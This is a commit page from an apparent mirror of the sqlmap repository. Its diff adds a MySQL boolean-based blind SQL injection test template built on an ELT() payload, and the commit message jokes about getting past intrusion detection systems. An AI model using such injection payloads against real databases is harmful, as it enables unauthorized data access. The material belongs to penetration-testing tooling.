mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-03 13:14:13 +03:00
another premiere, yeeej. IDSes, watch yourself :)
This commit is contained in:
parent
2fb0c946d2
commit
9f76468005
|
@ -629,6 +629,25 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>ELT([INFERENCE],[ORIGVALUE])</vector>
|
||||
<request>
|
||||
<payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - Parameter replace</title>
|
||||
<stype>1</stype>
|
||||
|
|
Loading…
Reference in New Issue
Block a user